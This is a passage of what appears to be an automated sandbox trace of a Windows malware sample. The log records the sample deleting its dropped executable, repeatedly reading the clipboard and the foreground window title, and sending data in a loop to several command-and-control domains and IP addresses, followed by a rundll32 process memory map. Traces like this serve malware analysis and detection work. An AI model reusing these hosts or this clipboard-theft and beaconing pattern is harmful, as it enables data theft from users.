(This=0x7d96888) returned 0x2 [0177.103] FileOperation:IUnknown:Release (This=0x7d97ca8) returned 0x0 [0177.103] FileOperation:IUnknown:Release (This=0x3dbde70) returned 0x0 [0177.104] CoUninitialize () [0177.115] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x7acf350, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.122] NtDeleteFile (ObjectAttributes=0x7acf360*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0)) returned 0x0 [0177.123] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x7acf350, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.123] NtCreateFile (in: FileHandle=0x7acf2f0, DesiredAccess=0x120089, ObjectAttributes=0x7acf360*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x7acf300, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x7acf2f0*=0xbd4, IoStatusBlock=0x7acf300*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0177.123] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x7acf270 | out: HeapArray=0x7acf270*=0x300000) returned 0x11 [0177.123] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x7b82850) returned 1 [0177.123] NtQueryInformationFile (in: FileHandle=0xbd4, IoStatusBlock=0x7acf300, FileInformation=0x7acf310, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x7acf300, FileInformation=0x7acf310) returned 0x0 [0177.123] NtClose (Handle=0xbd4) returned 0x0 [0177.123] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x7acf7e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.123] NtCreateFile (in: FileHandle=0x7acf780, DesiredAccess=0x120089, ObjectAttributes=0x7acf7f0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x7acf790, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x7acf780*=0xffffffffffffffff, IoStatusBlock=0x7acf790*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0177.123] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x7acf700 | out: HeapArray=0x7acf700*=0x300000) returned 0x11 [0177.123] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x7b82850) returned 1 [0177.140] OpenClipboard (hWndNewOwner=0x0) returned 1 [0177.140] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0177.140] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0177.140] GetForegroundWindow () returned 0x100f4 [0177.140] GetWindowTextW (in: hWnd=0x100f4, lpString=0x79ce2b2, nMaxCount=260 | out: lpString="FolderView") returned 10 [0177.167] GlobalUnlock (hMem=0x3b59e0) returned 1 [0177.167] CloseClipboard () returned 1 [0177.168] socket (af=2, type=1, protocol=6) returned 0xbd4 [0177.169] getaddrinfo (in: pNodeName="www.productprinting.online", pServiceName="80", pHints=0x7c5f9b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5f9e8 | out: ppResult=0x7c5f9e8*=0x3eb1fd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45970*(sa_family=2, sin_port=0x50, sin_addr="108.179.246.105"), ai_next=0x0)) returned 0 [0177.202] connect (s=0xbd4, name=0x7b45970*(sa_family=2, sin_port=0x50, sin_addr="108.179.246.105"), namelen=16) returned 0 [0177.366] RtlIntegerToChar (in: Value=0xc74, Base=0x0, Length=0x8, String=0x7acf848 | out: String="3188") returned 0x0 [0177.366] send (s=0xbd4, buf=0x79d6f32*, len=3723, flags=0) returned 3723 [0177.367] closesocket (s=0xbd4) returned 0 [0177.367] socket (af=2, type=1, protocol=6) returned 0xbd4 [0177.368] connect (s=0xbd4, name=0x7b45970*(sa_family=2, sin_port=0x50, sin_addr="108.179.246.105"), namelen=16) returned 0 [0177.525] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0177.525] send (s=0xbd4, buf=0x79d6f32*, len=790, flags=0) returned 790 [0177.525] closesocket (s=0xbd4) returned 0 [0177.525] socket (af=2, type=1, protocol=6) returned 0xbd4 [0177.526] connect (s=0xbd4, name=0x7b45970*(sa_family=2, sin_port=0x50, sin_addr="108.179.246.105"), namelen=16) returned 0 [0177.668] send (s=0xbd4, buf=0x79f4332*, len=174, flags=0) returned 174 [0177.668] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0177.668] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 448 [0178.235] closesocket (s=0xbd4) returned 0 [0178.236] Sleep (dwMilliseconds=0x1388) [0178.247] OpenClipboard (hWndNewOwner=0x0) returned 1 [0178.247] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0178.247] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0178.247] GlobalUnlock (hMem=0x3b59e0) returned 1 [0178.247] CloseClipboard () returned 1 [0178.247] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.248] getaddrinfo (in: pNodeName="www.mabduh.com", pServiceName="80", pHints=0x7c5fd58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5fd88 | out: ppResult=0x7c5fd88*=0x3eb3150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45b90*(sa_family=2, sin_port=0x50, sin_addr="206.189.58.26"), ai_next=0x3eb1e90*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45b10*(sa_family=2, sin_port=0x50, sin_addr="206.189.50.60"), ai_next=0x0))) returned 0 [0178.264] connect (s=0xbd4, name=0x7b45b90*(sa_family=2, sin_port=0x50, sin_addr="206.189.58.26"), namelen=16) returned 0 [0178.291] RtlIntegerToChar (in: Value=0xc74, Base=0x0, Length=0x8, String=0x7acf848 | out: String="3188") returned 0x0 [0178.292] send (s=0xbd4, buf=0x79d6f32*, len=3687, flags=0) returned 3687 [0178.292] closesocket (s=0xbd4) returned 0 [0178.292] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.293] connect (s=0xbd4, name=0x7b45b90*(sa_family=2, sin_port=0x50, sin_addr="206.189.58.26"), namelen=16) returned 0 [0178.315] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0178.315] send (s=0xbd4, buf=0x79d6f32*, len=754, flags=0) returned 754 [0178.315] closesocket (s=0xbd4) returned 0 [0178.315] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.316] connect (s=0xbd4, name=0x7b45b90*(sa_family=2, sin_port=0x50, sin_addr="206.189.58.26"), namelen=16) returned 0 [0178.344] send (s=0xbd4, buf=0x79f4332*, len=162, flags=0) returned 162 [0178.344] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0178.344] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 416 [0178.386] closesocket (s=0xbd4) returned 0 [0178.386] Sleep (dwMilliseconds=0x1388) [0178.402] OpenClipboard (hWndNewOwner=0x0) returned 1 [0178.402] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0178.402] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0178.402] GlobalUnlock (hMem=0x3b59e0) returned 1 [0178.402] CloseClipboard () returned 1 [0178.402] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.403] getaddrinfo (in: pNodeName="www.krveop.com", pServiceName="80", pHints=0x7c600f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60128 | out: ppResult=0x7c60128*=0x3eb2f90*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45b70*(sa_family=2, sin_port=0x50, sin_addr="172.67.158.14"), ai_next=0x3eb2090*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b459f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.26"), ai_next=0x0))) returned 0 [0178.410] connect (s=0xbd4, name=0x7b45b70*(sa_family=2, sin_port=0x50, sin_addr="172.67.158.14"), namelen=16) returned 0 [0178.440] RtlIntegerToChar (in: Value=0xc74, Base=0x0, Length=0x8, String=0x7acf848 | out: String="3188") returned 0x0 [0178.440] send (s=0xbd4, buf=0x79d6f32*, len=3687, flags=0) returned 3687 [0178.440] closesocket (s=0xbd4) returned 0 [0178.440] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.440] connect (s=0xbd4, name=0x7b45b70*(sa_family=2, sin_port=0x50, sin_addr="172.67.158.14"), namelen=16) returned 0 [0178.472] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0178.472] send (s=0xbd4, buf=0x79d6f32*, len=754, flags=0) returned 754 [0178.472] closesocket (s=0xbd4) returned 0 [0178.473] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.473] connect (s=0xbd4, name=0x7b45b70*(sa_family=2, sin_port=0x50, sin_addr="172.67.158.14"), namelen=16) returned 0 [0178.495] send (s=0xbd4, buf=0x79f4332*, len=162, flags=0) returned 162 [0178.495] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0178.495] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 954 [0178.732] closesocket (s=0xbd4) returned 0 [0178.734] Sleep (dwMilliseconds=0x1388) [0178.746] OpenClipboard (hWndNewOwner=0x0) returned 1 [0178.746] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0178.746] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0178.746] GlobalUnlock (hMem=0x3b59e0) returned 1 [0178.746] CloseClipboard () returned 1 [0178.746] socket (af=2, type=1, protocol=6) returned 0xbd4 [0178.746] getaddrinfo (in: pNodeName="www.lkkogltoyof4.xyz", pServiceName="80", pHints=0x7c60498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c604c8 | out: ppResult=0x7c604c8*=0x3eb1f50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45a90*(sa_family=2, sin_port=0x50, sin_addr="150.95.255.38"), ai_next=0x0)) returned 0 [0179.255] connect (s=0xbd4, name=0x7b45a90*(sa_family=2, sin_port=0x50, sin_addr="150.95.255.38"), namelen=16) returned 0 [0179.549] RtlIntegerToChar (in: Value=0xc74, Base=0x0, Length=0x8, String=0x7acf848 | out: String="3188") returned 0x0 [0179.549] send (s=0xbd4, buf=0x79d6f32*, len=3705, flags=0) returned 3705 [0179.549] closesocket (s=0xbd4) returned 0 [0179.549] socket (af=2, type=1, protocol=6) returned 0xbd4 [0179.550] connect (s=0xbd4, name=0x7b45a90*(sa_family=2, sin_port=0x50, sin_addr="150.95.255.38"), namelen=16) returned 0 [0179.912] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0179.912] send (s=0xbd4, buf=0x79d6f32*, len=772, flags=0) returned 772 [0179.912] closesocket (s=0xbd4) returned 0 [0179.913] socket (af=2, type=1, protocol=6) returned 0xbd4 [0179.913] connect (s=0xbd4, name=0x7b45a90*(sa_family=2, sin_port=0x50, sin_addr="150.95.255.38"), namelen=16) returned 0 [0180.274] send (s=0xbd4, buf=0x79f4332*, len=168, flags=0) returned 168 [0180.274] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0180.275] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 408 [0180.617] closesocket (s=0xbd4) returned 0 [0180.617] Sleep (dwMilliseconds=0x1388) [0180.633] OpenClipboard (hWndNewOwner=0x0) returned 1 [0180.633] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0180.633] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0180.633] GlobalUnlock (hMem=0x3b59e0) returned 1 [0180.633] CloseClipboard () returned 1 [0180.633] socket (af=2, type=1, protocol=6) returned 0xbd4 [0180.633] getaddrinfo (in: pNodeName="www.yogo7.net", pServiceName="80", pHints=0x7c60838*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60868 | out: ppResult=0x7c60868*=0x3eb2110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45ab0*(sa_family=2, sin_port=0x50, sin_addr="156.240.160.90"), ai_next=0x0)) returned 0 [0181.116] connect (s=0xbd4, name=0x7b45ab0*(sa_family=2, sin_port=0x50, sin_addr="156.240.160.90"), namelen=16) returned 0 [0181.391] RtlIntegerToChar (in: Value=0xc74, Base=0x0, Length=0x8, String=0x7acf848 | out: String="3188") returned 0x0 [0181.391] send (s=0xbd4, buf=0x79d6f32*, len=3684, flags=0) returned 3684 [0181.391] closesocket (s=0xbd4) returned 0 [0181.391] socket (af=2, type=1, protocol=6) returned 0xbd4 [0181.392] connect (s=0xbd4, name=0x7b45ab0*(sa_family=2, sin_port=0x50, sin_addr="156.240.160.90"), namelen=16) returned 0 [0182.222] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0182.222] send (s=0xbd4, buf=0x79d6f32*, len=751, flags=0) returned 751 [0182.222] closesocket (s=0xbd4) returned 0 [0182.223] socket (af=2, type=1, protocol=6) returned 0xbd4 [0182.223] connect (s=0xbd4, name=0x7b45ab0*(sa_family=2, sin_port=0x50, sin_addr="156.240.160.90"), namelen=16) returned 0 [0182.501] send (s=0xbd4, buf=0x79f4332*, len=161, flags=0) returned 161 [0182.501] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0182.501] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 1981 [0182.792] closesocket (s=0xbd4) returned 0 [0182.792] Sleep (dwMilliseconds=0x1388) [0182.801] OpenClipboard (hWndNewOwner=0x0) returned 1 [0182.801] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0182.801] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0182.801] GlobalUnlock (hMem=0x3b59e0) returned 1 [0182.801] CloseClipboard () returned 1 [0182.801] socket (af=2, type=1, protocol=6) returned 0xbd4 [0182.802] connect (s=0xbd4, name=0x7b46330*(sa_family=2, sin_port=0x50, sin_addr="156.239.192.219"), namelen=16) returned 0 [0183.236] RtlIntegerToChar (in: Value=0xc74, Base=0x0, Length=0x8, String=0x7acf848 | out: String="3188") returned 0x0 [0183.236] send (s=0xbd4, buf=0x79d6f32*, len=3726, flags=0) returned 3726 [0183.236] closesocket (s=0xbd4) returned 0 [0183.237] socket (af=2, type=1, protocol=6) returned 0xbd4 [0183.237] connect (s=0xbd4, name=0x7b46330*(sa_family=2, sin_port=0x50, sin_addr="156.239.192.219"), namelen=16) returned 0 [0183.602] RtlIntegerToChar (in: Value=0xfc, Base=0x0, Length=0x8, String=0x7acf848 | out: String="252") returned 0x0 [0183.602] send (s=0xbd4, buf=0x79d6f32*, len=793, flags=0) returned 793 [0183.602] closesocket (s=0xbd4) returned 0 [0183.603] socket (af=2, type=1, protocol=6) returned 0xbd4 [0183.603] connect (s=0xbd4, name=0x7b46330*(sa_family=2, sin_port=0x50, sin_addr="156.239.192.219"), namelen=16) returned 0 [0183.940] send (s=0xbd4, buf=0x79f4332*, len=181, flags=0) returned 181 [0183.941] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0183.941] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c) returned 0 [0184.298] closesocket (s=0xbd4) returned 0 [0184.299] Sleep (dwMilliseconds=0x1388) [0184.314] OpenClipboard (hWndNewOwner=0x0) returned 1 [0184.314] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0184.315] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0184.315] GlobalUnlock (hMem=0x3b59e0) returned 1 [0184.315] CloseClipboard () returned 1 [0184.315] getaddrinfo (in: pNodeName="www.medicalmanagementinc.info", pServiceName="80", pHints=0x7c60f78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60fa8 | out: ppResult=0x7c60fa8*=0x0) returned 11001 [0184.320] getaddrinfo (in: pNodeName="www.medicalmanagementinc.info", pServiceName="80", pHints=0x7c60f78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60fa8 | out: ppResult=0x7c60fa8*=0x0) returned 11001 [0184.321] getaddrinfo (in: pNodeName="www.medicalmanagementinc.info", pServiceName="80", pHints=0x7c60f78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60fa8 | out: ppResult=0x7c60fa8*=0x0) returned 11001 [0184.321] Sleep (dwMilliseconds=0x1388) [0184.330] OpenClipboard (hWndNewOwner=0x0) returned 1 [0184.330] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0184.330] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0184.330] GlobalUnlock (hMem=0x3b59e0) returned 1 [0184.330] CloseClipboard () returned 1 [0184.330] getaddrinfo (in: pNodeName="www.babybox.media", pServiceName="80", pHints=0x7c61318*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61348 | out: ppResult=0x7c61348*=0x0) returned 11001 [0184.336] getaddrinfo (in: pNodeName="www.babybox.media", pServiceName="80", pHints=0x7c61318*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61348 | out: ppResult=0x7c61348*=0x0) returned 11001 [0184.337] getaddrinfo (in: pNodeName="www.babybox.media", pServiceName="80", pHints=0x7c61318*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61348 | out: ppResult=0x7c61348*=0x0) returned 11001 [0184.337] Sleep (dwMilliseconds=0x1388) [0184.345] OpenClipboard (hWndNewOwner=0x0) returned 1 [0184.346] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0184.346] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0184.346] GlobalUnlock (hMem=0x3b59e0) returned 1 [0184.346] CloseClipboard () returned 1 [0184.346] getaddrinfo (pNodeName="www.wenyuexuan.com", pServiceName="80", pHints=0x7c616b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c616e8) Thread: id = 53 os_tid = 0xb24 Thread: id = 62 os_tid = 0xc8 Thread: id = 63 os_tid = 0xd6c Thread: id = 64 os_tid = 0xd68 Thread: id = 65 os_tid = 0xd70 Process: id = "4" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x3c261000" os_pid = "0xfa0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x45c" cmd_line = "\"C:\\Windows\\SysWOW64\\rundll32.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 965 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 966 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 967 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 968 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 969 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 970 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 971 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 972 start_va = 0x350000 end_va = 0x35dfff monitored = 0 entry_point = 0x35178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 973 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 974 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 975 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 976 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 977 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 978 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 979 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 980 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 981 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 983 start_va = 0x70000 end_va = 0x98fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 985 start_va = 0x350000 end_va = 0x35dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 986 start_va = 0x510000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 987 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 988 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 989 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 990 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 991 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 992 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 993 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 994 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 995 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 996 start_va = 0x590000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 997 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 998 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 999 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1000 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1001 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1002 start_va = 0xa0000 end_va = 0x106fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1003 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 